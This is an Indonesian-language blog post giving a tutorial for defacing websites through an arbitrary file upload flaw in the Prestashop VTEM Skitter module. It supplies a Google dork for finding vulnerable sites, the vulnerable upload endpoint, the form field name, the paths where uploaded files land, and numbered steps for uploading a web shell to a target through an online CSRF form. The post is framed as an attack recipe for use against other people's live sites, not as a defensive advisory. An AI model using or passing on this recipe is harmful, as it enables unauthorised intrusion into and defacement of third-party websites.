Deface Menggunakan Prestashop VTEM Skitter Arbitrary File Upload
Pada kesempatan kali ini , gua mau share Deface Menggunakan Prestashop VTEM Skitter Arbitrary File Upload
dah lah langsung ajh
Google Dork : inrul:modules/vtemskitter/
Exploit : /modules/vtemskitter/uploadimage.php
CSRF online : Disini atau Disana
isi Postname dengan = userfile
Akses file = site.com//modules/vtemskitter/img/urfile or site.com//modules/vtemskitter/slides/urfile
Step :
1. Dorking , searchnya di images/gambar saja
2. pilih salah satu gambar
3. masukan exploit di atas
4. vuln = error
5. masukkan site yg vuln tdi ke csrf , isi Postname dengan = userfile. kalo sudak klik OKe
6. upload shell lu , kalo sudah klik JOS
7. akses file liat di atas
Kalo lu msh blm paham -_- gua kasih vidionya punya si Aweu404 neh
Post a Comment